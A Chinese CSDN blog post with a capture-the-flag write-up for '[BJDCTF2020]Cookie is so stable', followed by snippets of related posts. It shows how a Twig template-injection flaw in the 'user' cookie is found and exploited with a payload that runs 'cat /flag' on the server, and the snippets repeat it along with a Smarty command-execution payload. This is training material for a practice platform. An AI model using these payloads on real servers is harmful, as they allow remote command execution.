第四十七题——[BJDCTF2020]Cookie is so stable

最新推荐文章于 2024-06-13 07:36:50 发布
最新推荐文章于 2024-06-13 07:36:50 发布
阅读量194 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/116200956
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名

在这里插入图片描述

第二步:查找漏洞点

  1. 输入admin没有反应
    在这里插入图片描述

  2. 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2

第三步:了解Twig漏洞后获取flag

  1. Twing漏洞

  2. 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题
    在这里插入图片描述

  3. 修改user值为:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}获取flag
    在这里插入图片描述

想学习安全的小白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 344
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 346
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
[BJDCTF2020]Cookie is so stable
Yang_99的博客
08-14 218
ssti Twig模板注入 发现这个输入框存在ssti漏洞。 如果输出49那么是Twig,如果是7777777那么就是jinja 在源代码中可以发现提示: 这条提示说明注入点在cookie。 修改cookie得到flag payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}}; https://zhuanlan.zhihu.com/p/28823933 ...
[BJDCTF2020]Cookie is so stable1
m0_73673698的博客
06-13 510
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开目,看到如下页面。
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3504
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
亚信java笔试-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web目easyaspnet需要在windows server 2016 docker native ...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2762
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源好像有点差别。 进放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
cookie is nil
最新发布
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值